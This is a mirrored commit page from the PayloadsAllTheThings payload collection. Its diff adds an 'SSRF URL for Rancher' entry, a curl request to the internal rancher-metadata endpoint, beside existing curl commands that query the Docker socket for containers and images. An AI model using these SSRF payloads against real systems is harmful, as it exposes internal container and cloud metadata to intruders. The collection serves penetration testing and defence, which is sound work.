mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 02:46:10 +00:00
Add Rancher Metadata Service
This commit is contained in:
parent
35d4139373
commit
78103d13a1
@ -436,6 +436,13 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
|
|||||||
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
|
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Rancher
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl http://rancher-metadata/<version>/<path>
|
||||||
|
```
|
||||||
|
|
||||||
|
More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user